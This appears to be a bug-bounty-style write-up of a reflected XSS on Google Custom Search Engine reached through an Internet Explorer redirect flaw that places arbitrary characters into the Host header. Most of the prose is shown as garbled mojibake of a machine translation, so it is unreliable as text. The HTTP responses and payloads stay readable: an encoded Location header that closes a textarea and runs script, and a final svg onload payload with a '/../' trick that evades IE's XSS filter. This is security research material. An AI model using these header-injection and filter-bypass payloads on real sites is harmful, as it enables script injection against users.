ͨ¹ýÖ÷»ú±êÍ·µÄ XSS

ÔÚ IE Öд¦ÀíÖض¨ÏòʱÓÐÒ»¸öÓÐȤµÄ´íÎó£¬Ëü¿ÉÒÔ½«ÈÎÒâ×Ö·û²åÈëµ½ Host ±êÍ·ÖС£¼ÙÉèÄúÓÐÒÔÏ http ÏìÓ¦£º

HTTP/1.1 302 ·¢ÏÖ

ÈÕÆÚ£º2015 Äê 3 Ô 6 ÈÕÐÇÆÚÎå 08:35:32 GMT

·þÎñÆ÷£ºApache/2.2.22 (Debian)

X-Powered-By£ºPHP/5.4.36-0+deb7u3

λÖãºhttp://example .com%2flogin.php

Vary: Accept-Encoding

Content-Length: 0

Connection: close

Content-Type: text/html

²Â²Â½ÓÏÂÀ´»á·¢³öʲôÇëÇ󣿻ᷢÐÐÂð£¿Location ±êÍ·¿´ÆðÀ´²¢²»ÕýÈ·......ËùÒÔÕâÊÇ IE Ëù×öµÄ£º

GET /login.phphp/ HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Accept-Language: pl-PL

Óû§´úÀí£ºMozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Accept-Encoding: gzip, deflate

Host: example.com/login.php

DNT: 1

Connection: Keep-Alive

Cache-Control: no-cache

¿ÉÒÔ¿´µÄû´í£ºHostÍ·ÖÐÓС°example.com/login.php¡±¡£»¹ÓÐһЩÆæ¹ÖµÄ·¾¶£ºÎªÊ²Ã´ÔÚµØÇòÉÏÊÇ login.phphp ¶øԭʼ URL ÖÐûÓÐÀàËƵĶ«Î÷£¿ºÃ°É£¬¿´À´ IE ¶ÔÆä URL ±àÂëºÍ URL ½âÂëÐÎʽµÄ·¾¶×öÁËһЩÆæ¹ÖµÄ¸²¸Ç¡£Í¼Æ¬ËµÃ÷ÁËÒ»ÇУº

¼ÌÐøÇ°½ø£¬Äú¿ÉÄÜ»áÆÚÍû·þÎñÆ÷»áÇãÏòÓÚÒÔ 400 Bad Request ÏìÓ¦ÕâÑùÒ»¸öÆæ¹ÖµÄ Host ±êÍ·¡£Õâͨ³£ÊÇÕæµÄ......

µ«ÐÒÔ˵ÄÊÇ£¬Google ÔÚ´¦Àí Host ±êͷʱ´æÔÚһЩ¹Öñ±£¬¿ÉÒÔÈƹýËü¡£

¹Öñ±ÊÇÔÚÖ÷»úÍ·ÖÐÌí¼Ó¶Ë¿ÚºÅ¡£Ëüʵ¼ÊÉÏûÓо­¹ýÑéÖ¤£¬Äú¿ÉÒÔÔÚðºÅºó·ÅÖÃÄúϲ»¶µÄÈκÎ×Ö·û´®¡£¾ÍÏñÔÚ Gmail ÉÏÕâÑù£º

Gmail ×ã¹»´ÏÃ÷£¬¿ÉÒÔ¶ÔÆä½øÐÐÕýÈ·±àÂë¡£

ÔÚ¼ÌÐøÌÖÂÛÕýÈ·µÄ XSS ֮ǰ£¬ÎÒÐèÒªÌáµ½ÁíÒ»¸ö Google ·þÎñÆ÷µÄÌض¨ÐÐΪ£¬ÉÔºó½«ÐèÒªËüÀ´Èƹý IE µÄ XSS ±£»¤¡£Í¨³££¬µ±Äú³¢ÊÔµ½´ï·¾¶ÄÚ²¿»á³öÏÖË«µãʱ£¨ÀýÈç /test1/../test2£©£¬Google ·þÎñÆ÷»áÁ¢¼´¶ÔÆä½øÐй淶»¯²¢·¢³öÖض¨Ïò¡£

µ«ÊÇ£¬µ±ÄúÔÚ·¾¶ÖÐÌí¼Ó·ÖºÅʱ£¬ÉñÆæµØ²»ÔÙ·¢ÉúÕâÖÖÇé¿ö¡£

ºÃµÄ£¬ÈÃÎÒÃǼÌÐøÌÖÂÛ Google CSE XSS¡£Ëü¿´ÆðÀ´¾ÍÏñÕâÑù£º

Ö÷»ú±êÍ·Çå³þµØ·´Ó³ÔÚÏìÓ¦ÖУ¬ÎÞÐèÈκαàÂë¡£Çë×¢Ò⣬Burp µÄÓï·¨¸ßÁÁÔÚÆÁÄ»½ØͼÖоßÓÐÎóµ¼ÐÔ£º</textarea>ʵ¼ÊÉϹرÕÁ˱êÇ©£¬½Å±¾½«±»Ö´ÐС£

ËùÒÔÎÒ×¼±¸ÁËÒ»¸ö¼òµ¥µÄÍøÒ³£¬·µ»ØÒÔÏ http ÏìÓ¦£º

HTTP/1.1 302 Found

Server: Apache/2.2.22 (Debian)

Location: https://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b% 3c%2ftextarea%3e%3cscript%3ealert(1)%3c%2fscript%3e

ÆÚÍûÏÂÒ»¸öÇëÇ󽫰üº¬ÒÔÏÂÖ÷»ú±êÍ·£º

Ö÷»ú£ºwww.google.com:443/cse/tools/create_onthefly;</textarea><script>alert(1)</script>

Õâȷʵ·¢ÉúÁË£¬µ« IE ÖªµÀÕâÀï·¢ÉúÁËһЩÊÂÇé......

ÐÒÔ˵ÄÊÇ£¬IE µÄ XSS ¹ýÂËÆ÷ºÜ±¿£¬ºÜÈÝÒ×ÈƹýËü¡£»¹¼ÇµÃ·ÖºÅºÍ¡°../¡±µÄ¼¼ÇÉÂ𣿺ðɣ¬¹ýÂËÆ÷Ëƺõͨ¹ý½«µØÖ·À¸ÖÐµÄ URL ÓëÒ³ÃæÄÚÈݽøÐбȽÏÀ´¹¤×÷¡£Òò´Ë£¬µ±ÄúÏò/<svg/onload=alert(1)/../../·¢³öÇëÇóʱ£¬IE ½«ÔÚµØÖ·À¸ÖÐ×Ô¶¯½«Æä¹æ·¶»¯Îª/²¢ÇÒ½«²»ÔÙ¿´µ½ XSS¡£Õâ¼òֱ̫¸ãЦÁË£¡

ËùÒÔ×îÖÕÎÒÓÐÒ»¸ö´øÓÐÒÔϱêÌâµÄÒ³Ã棺

λÖãºhttps://www.google.com%3a443%2fcse%2ftools%2fcreate_onthefly%3b%3c%2ftextarea%3e%3csvg%2fonload%3dalert%28document%2edomain%29 %3e%3b%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e %2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f

£¨ÆäÖÐÖµ½âÂëΪ£ºÎ»Öãºhttps://www.google.com:443/cse/tools/create_onthefly;</textarea><svg/onload=alert(document.domain)>?;/../.. /../../../../../../../../../../../../)